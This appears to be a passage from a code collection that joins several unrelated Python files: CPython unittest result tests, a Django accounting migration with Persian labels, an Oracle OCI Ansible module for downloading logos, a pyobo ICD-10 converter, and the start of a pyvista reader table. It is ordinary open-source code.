"""Tests getDescription() for a method with a docstring."""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithOneLineDocstring '
'(' + __name__ + '.Test_TestResult) (foo=1, bar=2)\n'
'Tests getDescription() for a method with a docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
self.assertEqual(
result.getDescription(self),
('testGetDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def testGetSubTestDescriptionWithMultiLineDocstring(self):
"""Tests getDescription() for a method with a longer docstring.
The second line of the docstring.
"""
result = unittest.TextTestResult(None, True, 1)
with self.subTest(foo=1, bar=2):
self.assertEqual(
result.getDescription(self._subtest),
('testGetSubTestDescriptionWithMultiLineDocstring '
'(' + __name__ + '.Test_TestResult) (foo=1, bar=2)\n'
'Tests getDescription() for a method with a longer '
'docstring.'))
def testStackFrameTrimming(self):
class Frame(object):
class tb_frame(object):
f_globals = {}
result = unittest.TestResult()
self.assertFalse(result._is_relevant_tb_level(Frame))
Frame.tb_frame.f_globals['__unittest'] = True
self.assertTrue(result._is_relevant_tb_level(Frame))
def testFailFast(self):
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addError(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addFailure(None, None)
self.assertTrue(result.shouldStop)
result = unittest.TestResult()
result._exc_info_to_string = lambda *_: ''
result.failfast = True
result.addUnexpectedSuccess(None)
self.assertTrue(result.shouldStop)
def testFailFastSetByRunner(self):
stream = BufferedWriter()
runner = unittest.TextTestRunner(stream=stream, failfast=True)
def test(result):
self.assertTrue(result.failfast)
result = runner.run(test)
stream.flush()
self.assertTrue(stream.getvalue().endswith('\n\nOK\n'))
classDict = dict(unittest.TestResult.__dict__)
for m in ('addSkip', 'addExpectedFailure', 'addUnexpectedSuccess',
'__init__'):
del classDict[m]
def __init__(self, stream=None, descriptions=None, verbosity=None):
self.failures = []
self.errors = []
self.testsRun = 0
self.shouldStop = False
self.buffer = False
self.tb_locals = False
classDict['__init__'] = __init__
OldResult = type('OldResult', (object,), classDict)
class Test_OldTestResult(unittest.TestCase):
def assertOldResultWarning(self, test, failures):
with warnings_helper.check_warnings(
("TestResult has no add.+ method,", RuntimeWarning)):
result = OldResult()
test.run(result)
self.assertEqual(len(result.failures), failures)
def testOldTestResult(self):
class Test(unittest.TestCase):
def testSkip(self):
self.skipTest('foobar')
@unittest.expectedFailure
def testExpectedFail(self):
raise TypeError
@unittest.expectedFailure
def testUnexpectedSuccess(self):
pass
for test_name, should_pass in (('testSkip', True),
('testExpectedFail', True),
('testUnexpectedSuccess', False)):
test = Test(test_name)
self.assertOldResultWarning(test, int(not should_pass))
def testOldTestTesultSetup(self):
class Test(unittest.TestCase):
def setUp(self):
self.skipTest('no reason')
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldTestResultClass(self):
@unittest.skip('no reason')
class Test(unittest.TestCase):
def testFoo(self):
pass
self.assertOldResultWarning(Test('testFoo'), 0)
def testOldResultWithRunner(self):
class Test(unittest.TestCase):
def testFoo(self):
pass
runner = unittest.TextTestRunner(resultclass=OldResult,
stream=io.StringIO())
# This will raise an exception if TextTestRunner can't handle old
# test result objects
runner.run(Test('testFoo'))
class TestOutputBuffering(unittest.TestCase):
def setUp(self):
self._real_out = sys.stdout
self._real_err = sys.stderr
def tearDown(self):
sys.stdout = self._real_out
sys.stderr = self._real_err
def testBufferOutputOff(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
def testBufferOutputStartTestAddSuccess(self):
real_out = self._real_out
real_err = self._real_err
result = unittest.TestResult()
self.assertFalse(result.buffer)
result.buffer = True
self.assertIs(real_out, sys.stdout)
self.assertIs(real_err, sys.stderr)
result.startTest(self)
self.assertIsNot(real_out, sys.stdout)
self.assertIsNot(real_err, sys.stderr)
self.assertIsInstance(sys.stdout, io.StringIO)
self.assertIsInstance(sys.stderr, io.StringIO)
self.assertIsNot(sys.stdout, sys.stderr)
out_stream = sys.stdout
err_stream = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo')
print('bar', file=sys.stderr)
self.assertEqual(out_stream.getvalue(), 'foo\n')
self.assertEqual(err_stream.getvalue(), 'bar\n')
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
result.addSuccess(self)
result.stopTest(self)
self.assertIs(sys.stdout, result._original_stdout)
self.assertIs(sys.stderr, result._original_stderr)
self.assertEqual(result._original_stdout.getvalue(), '')
self.assertEqual(result._original_stderr.getvalue(), '')
self.assertEqual(out_stream.getvalue(), '')
self.assertEqual(err_stream.getvalue(), '')
def getStartedResult(self):
result = unittest.TestResult()
result.buffer = True
result.startTest(self)
return result
def testBufferOutputAddErrorOrFailure(self):
unittest.result.traceback = MockTraceback
self.addCleanup(restore_traceback)
for message_attr, add_attr, include_error in [
('errors', 'addError', True),
('failures', 'addFailure', False),
('errors', 'addError', True),
('failures', 'addFailure', False)
]:
result = self.getStartedResult()
buffered_out = sys.stdout
buffered_err = sys.stderr
result._original_stdout = io.StringIO()
result._original_stderr = io.StringIO()
print('foo', file=sys.stdout)
if include_error:
print('bar', file=sys.stderr)
addFunction = getattr(result, add_attr)
addFunction(self, (None, None, None))
result.stopTest(self)
result_list = getattr(result, message_attr)
self.assertEqual(len(result_list), 1)
test, message = result_list[0]
expectedOutMessage = textwrap.dedent("""
Stdout:
foo
""")
expectedErrMessage = ''
if include_error:
expectedErrMessage = textwrap.dedent("""
Stderr:
bar
""")
expectedFullMessage = 'A traceback%s%s' % (expectedOutMessage, expectedErrMessage)
self.assertIs(test, self)
self.assertEqual(result._original_stdout.getvalue(), expectedOutMessage)
self.assertEqual(result._original_stderr.getvalue(), expectedErrMessage)
self.assertMultiLineEqual(message, expectedFullMessage)
def testBufferSetUp(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDown(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def tearDown(self):
print('tear down')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferDoCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
self.addCleanup(bad_cleanup1)
self.addCleanup(bad_cleanup2)
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(str(test_case), description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetUp_DoCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
self.addCleanup(bad_cleanup1)
self.addCleanup(bad_cleanup2)
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(str(test_case), description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(str(test_case), description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDown_DoCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def setUp(self):
print('set up')
self.addCleanup(bad_cleanup1)
self.addCleanup(bad_cleanup2)
def tearDown(self):
print('tear down')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up\ntear down\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'test_foo ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(str(test_case), description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(str(test_case), description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(str(test_case), description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetupClass(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up class\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'setUpClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownClass(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def tearDownClass(cls):
print('tear down class')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down class\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = f'tearDownClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferDoClassCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
cls.addClassCleanup(bad_cleanup1)
cls.addClassCleanup(bad_cleanup2)
@classmethod
def tearDownClass(cls):
print('tear down class')
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down class\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = f'tearDownClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetupClass_DoClassCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
cls.addClassCleanup(bad_cleanup1)
cls.addClassCleanup(bad_cleanup2)
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up class\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'setUpClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\nset up class\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(test_case.description, description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownClass_DoClassCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
@classmethod
def setUpClass(cls):
print('set up class')
cls.addClassCleanup(bad_cleanup1)
cls.addClassCleanup(bad_cleanup2)
@classmethod
def tearDownClass(cls):
print('tear down class')
1/0
def test_foo(self):
pass
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down class\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 3)
description = f'tearDownClass ({strclass(Foo)})'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\ntear down class\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
test_case, formatted_exc = result.errors[2]
self.assertEqual(test_case.description, description)
self.assertIn('TypeError: bad cleanup1', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetUpModule(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up module\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = 'setUpModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownModule(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def tearDownModule():
print('tear down module')
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down module\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = 'tearDownModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferDoModuleCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
unittest.addModuleCleanup(bad_cleanup1)
unittest.addModuleCleanup(bad_cleanup2)
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 1)
description = 'tearDownModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferSetUpModule_DoModuleCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
unittest.addModuleCleanup(bad_cleanup1)
unittest.addModuleCleanup(bad_cleanup2)
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\nset up module\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = 'setUpModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\nset up module\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertIn(expected_out, formatted_exc)
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
def testBufferTearDownModule_DoModuleCleanups(self):
with captured_stdout() as stdout:
result = unittest.TestResult()
result.buffer = True
class Foo(unittest.TestCase):
def test_foo(self):
pass
class Module(object):
@staticmethod
def setUpModule():
print('set up module')
unittest.addModuleCleanup(bad_cleanup1)
unittest.addModuleCleanup(bad_cleanup2)
@staticmethod
def tearDownModule():
print('tear down module')
1/0
Foo.__module__ = 'Module'
sys.modules['Module'] = Module
self.addCleanup(sys.modules.pop, 'Module')
suite = unittest.TestSuite([Foo('test_foo')])
suite(result)
expected_out = '\nStdout:\ntear down module\ndo cleanup2\ndo cleanup1\n'
self.assertEqual(stdout.getvalue(), expected_out)
self.assertEqual(len(result.errors), 2)
description = 'tearDownModule (Module)'
test_case, formatted_exc = result.errors[0]
self.assertEqual(test_case.description, description)
self.assertIn('ZeroDivisionError: division by zero', formatted_exc)
self.assertNotIn('ValueError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn('\nStdout:\ntear down module\n', formatted_exc)
test_case, formatted_exc = result.errors[1]
self.assertEqual(test_case.description, description)
self.assertIn('ValueError: bad cleanup2', formatted_exc)
self.assertNotIn('ZeroDivisionError', formatted_exc)
self.assertNotIn('TypeError', formatted_exc)
self.assertIn(expected_out, formatted_exc)
if __name__ == '__main__':
unittest.main()
|
# Generated by Django 3.1 on 2020-09-20 19:54
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('app', '0008_auto_20200920_0550'),
('accounting', '0001_initial'),
]
operations = [
migrations.AlterModelOptions(
name='bank',
options={'verbose_name': 'Bank', 'verbose_name_plural': 'بانک ها'},
),
migrations.AlterModelOptions(
name='bankaccount',
options={'verbose_name': 'BankAccount', 'verbose_name_plural': 'حساب های بانکی'},
),
migrations.AlterModelOptions(
name='cash',
options={'verbose_name': 'Cash', 'verbose_name_plural': 'صندوق ها'},
),
migrations.AlterModelOptions(
name='currentfeecategory',
options={'verbose_name': 'CurrentFeeCategory', 'verbose_name_plural': 'دسته بندی های هزینه های جاری'},
),
migrations.AlterModelOptions(
name='financialprofile',
options={'verbose_name': 'FinancialProfile', 'verbose_name_plural': 'پروفایل ها مالی'},
),
migrations.AlterModelOptions(
name='financialtransaction',
options={'verbose_name': 'FinancialTransaction', 'verbose_name_plural': 'تراکنش های مالی'},
),
migrations.AlterModelOptions(
name='financialyear',
options={'verbose_name': 'FinancialYear', 'verbose_name_plural': 'سال های مالی'},
),
migrations.AddField(
model_name='bankaccount',
name='owner',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, to='app.profile', verbose_name='صاحب حساب'),
),
]
|
#!/usr/bin/python
# Copyright (c) 2020, 2022 Oracle and/or its affiliates.
# This software is made available to you under the terms of the GPL 3.0 license or the Apache 2.0 license.
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# Apache License v2.0
# See LICENSE.TXT for details.
# GENERATED FILE - DO NOT EDIT - MANUAL CHANGES WILL BE OVERWRITTEN
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {
"metadata_version": "1.1",
"status": ["preview"],
"supported_by": "community",
}
DOCUMENTATION = """
---
module: oci_service_catalog_private_application_logo_facts
short_description: Fetches details about a PrivateApplicationLogo resource in Oracle Cloud Infrastructure
description:
- Fetches details about a PrivateApplicationLogo resource in Oracle Cloud Infrastructure
- Downloads the binary payload of the logo image of the private application.
version_added: "2.9.0"
author: Oracle (@oracle)
options:
dest:
description:
- The destination file path to write the output. The file will be created if it does not exist. If the file already exists, the content will be
overwritten.
type: str
required: true
private_application_id:
description:
- The unique identifier for the private application.
type: str
aliases: ["id"]
required: true
extends_documentation_fragment: [ oracle.oci.oracle ]
"""
EXAMPLES = """
- name: Get a specific private_application_logo
oci_service_catalog_private_application_logo_facts:
# required
dest: /tmp/myfile
private_application_id: "ocid1.privateapplication.oc1..xxxxxxEXAMPLExxxxxx"
"""
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_bytes
from ansible_collections.oracle.oci.plugins.module_utils import oci_common_utils
from ansible_collections.oracle.oci.plugins.module_utils.oci_resource_utils import (
OCIResourceFactsHelperBase,
get_custom_class,
)
try:
from oci.service_catalog import ServiceCatalogClient
HAS_OCI_PY_SDK = True
except ImportError:
HAS_OCI_PY_SDK = False
class PrivateApplicationLogoFactsHelperGen(OCIResourceFactsHelperBase):
"""Supported operations: get"""
def get_required_params_for_get(self):
return [
"private_application_id",
]
def get_resource(self):
return oci_common_utils.call_with_backoff(
self.client.get_private_application_action_download_logo,
private_application_id=self.module.params.get("private_application_id"),
)
def get(self):
response = self.get_resource().data
dest = self.module.params.get("dest")
chunk_size = oci_common_utils.MEBIBYTE
with open(to_bytes(dest), "wb") as dest_file:
for chunk in response.raw.stream(chunk_size, decode_content=True):
dest_file.write(chunk)
return None
PrivateApplicationLogoFactsHelperCustom = get_custom_class(
"PrivateApplicationLogoFactsHelperCustom"
)
class ResourceFactsHelper(
PrivateApplicationLogoFactsHelperCustom, PrivateApplicationLogoFactsHelperGen
):
pass
def main():
module_args = oci_common_utils.get_common_arg_spec()
module_args.update(
dict(
dest=dict(type="str", required=True),
private_application_id=dict(aliases=["id"], type="str", required=True),
)
)
module = AnsibleModule(argument_spec=module_args)
if not HAS_OCI_PY_SDK:
module.fail_json(msg="oci python sdk required for this module.")
resource_facts_helper = ResourceFactsHelper(
module=module,
resource_type="private_application_logo",
service_client_class=ServiceCatalogClient,
namespace="service_catalog",
)
result = []
if resource_facts_helper.is_get():
result = resource_facts_helper.get()
else:
resource_facts_helper.fail()
module.exit_json(private_application_logo=result)
if __name__ == "__main__":
main()
|
# -*- coding: utf-8 -*-
"""Convert ICD-10 to OBO.
Run with python -m pyobo.sources.icd10 -v
"""
import logging
from typing import Any, Iterable, Mapping
import click
from more_click import verbose_option
from tqdm import tqdm
from ..sources.icd_utils import (
ICD10_TOP_LEVEL_URL,
get_child_identifiers,
get_icd,
visiter,
)
from ..struct import Obo, Reference, Synonym, Term
from ..utils.path import prefix_directory_join
logger = logging.getLogger(__name__)
PREFIX = "icd10"
VERSION = "2016"
def get_obo() -> Obo:
"""Get ICD-10 as OBO."""
return Obo(
ontology=PREFIX,
name="International Statistical Classification of Diseases and Related Health Problems 10th Revision",
auto_generated_by=f"bio2obo:{PREFIX}",
iter_terms=iter_terms,
)
def iter_terms() -> Iterable[Term]:
"""Iterate over ICD-10 terms."""
r = get_icd(ICD10_TOP_LEVEL_URL)
res_json = r.json()
directory = prefix_directory_join(PREFIX, version=VERSION)
chapter_urls = res_json["child"]
tqdm.write(f"there are {len(chapter_urls)} chapters")
visited_identifiers = set()
for identifier in get_child_identifiers(ICD10_TOP_LEVEL_URL, res_json):
yield from visiter(
identifier,
visited_identifiers,
directory,
endpoint=ICD10_TOP_LEVEL_URL,
converter=_extract_icd10,
)
def _extract_icd10(res_json: Mapping[str, Any]) -> Term:
identifier = res_json["code"]
name = res_json["title"]["@value"]
synonyms = [Synonym(synonym["label"]["@value"]) for synonym in res_json.get("synonym", [])]
parents = [
Reference(prefix=PREFIX, identifier=url[len(ICD10_TOP_LEVEL_URL) :])
for url in res_json["parent"]
if url[len(ICD10_TOP_LEVEL_URL) :]
]
rv = Term(
reference=Reference(prefix=PREFIX, identifier=identifier, name=name),
synonyms=synonyms,
parents=parents,
)
rv.append_property("class_kind", res_json["classKind"])
return rv
@click.command()
@verbose_option
def _main():
get_obo().write_default(use_tqdm=True)
if __name__ == "__main__":
_main()
|
"""Contains a dictionary that maps file extensions to VTK readers."""
import pathlib
import os
import numpy as np
import vtk
import pyvista
VTK9 = vtk.vtkVersion().GetVTKMajorVersion() >= 9
READERS = {
# Standard dataset readers:
'.vtk': vtk.vtkDataSetReader,
'.pvtk': vtk.vtkPDataSetReader,
'.vti': vtk.vtkXMLImageDataReader,
'.pvti': vtk.vtkXMLPImageDataReader,
'.vtr': vtk.vtkXMLRectilinearGridReader,
'.pvtr': vtk.vtkXMLPRectilinearGridReader,
'.vtu': vtk.vtkXMLUnstructuredGridReader,
'.pvtu': vtk.vtkXMLPUnstructuredGridReader,
'.ply': vtk.vtkPLYReader,
'.obj': vtk.vtkOBJReader,
'.stl': vtk.vtkSTLReader,
'.vtp': vtk.vtkXMLPolyDataReader,
'.vts': vtk.vtkXMLStructuredGridReader,
'.vtm': vtk.vtkXMLMultiBlockDataReader,
'.vtmb': vtk.vtkXMLMultiBlockDataReader,
'.case': vtk.vtkGenericEnSightReader,
# Image formats:
'.bmp': vtk.vtkBMPReader,
'.dem': vtk.vtkDEMReader,
'.dcm': vtk.vtkDICOMImageReader,
'.img': vtk.vtkDICOMImageReader,
'.jpeg': vtk.vtkJPEGReader,
'.jpg': vtk.vtkJPEGReader,
'.mhd': vtk.vtkMetaImageReader,
'.nrrd': vtk.vtkNrrdReader,
'.nhdr': vtk.vtkNrrdReader,
'.png': vtk.vtkPNGReader,
'.pnm': vtk.vtkPNMReader, # TODO: not tested
'.slc': vtk.vtkSLCReader,
'.tiff': vtk.vtkTIFFReader,
'.tif': vtk.vtkTIFFReader,
# Other formats:
'.byu': vtk.vtkBYUReader, # TODO: not tested with this extension
'.g': vtk.vtkBYUReader,
# '.chemml': vtk.vtkCMLMoleculeReader, # TODO: not tested
# '.cml': vtk.vtkCMLMoleculeReader, # vtkMolecule is not supported by pyvista
# TODO: '.csv': vtk.vtkCSVReader, # vtkTables are currently not supported
'.facet': vtk.vtkFacetReader,
'.cas': vtk.vtkFLUENTReader, # TODO: not tested
# '.dat': vtk.vtkFLUENTReader, # TODO: not working
# '.cube': vtk.vtkGaussianCubeReader, # Contains `atom_types` which are note supported?
'.res': vtk.vtkMFIXReader, # TODO: not tested
'.foam': vtk.vtkOpenFOAMReader,
